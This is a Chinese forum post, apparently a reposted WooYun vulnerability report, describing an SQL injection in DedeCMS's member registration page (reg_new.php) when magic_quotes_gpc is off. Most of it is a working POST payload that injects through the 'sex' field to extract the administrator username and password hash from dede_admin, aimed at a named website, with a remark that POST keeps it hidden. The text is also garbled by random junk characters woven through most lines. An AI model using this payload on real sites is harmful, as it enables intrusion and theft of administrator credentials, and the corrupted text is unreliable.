漏洞类型: SQL注射漏洞
+ | V3 l# U) g7 P* R( q简要描述:
6 l ]3 Z, M4 I/ O 4 a. [* _1 J7 J- t6 S; ~
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
$ ~- C s3 A% b, g4 q/ C原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
- B) v) n1 O: L' ^$ k' t详细说明:跟这个漏洞
" p, W+ n' r+ i7 P' ] % a* R$ w0 e( e R# G
WooYun: Dedecms SQL注射导致审核机制绕过漏洞% f; H0 \, j+ X
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.: M$ h% J! g, u) s
POST提交以下数据,其实不用POST提交的,这样隐蔽点.+ R! e) E( N! f$ B( B
8 l+ P) w# u$ h r Z+ x
www.political-security.com/member/reg_new.php
: q2 J$ O: F% H& s# L
' e3 k n# i* y7 z8 k4 O9 Y0 h% QPOST
3 p* L0 c( X' S- M/ c a" y. ^+ H
# F+ g( M/ _( wdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
% ]& U" z1 U4 @# D2 u7 x% `& vuserid=c4rp3nt3r&uname=c4rp3nt3r
0 t2 | }5 y/ \5 m5 k3 i' g&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
/ m* j* f7 |0 m- t&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,/ ~! t+ {# b' {, f+ P; }
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
: D9 z/ q% ` C6 O- U. F1 o) v%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对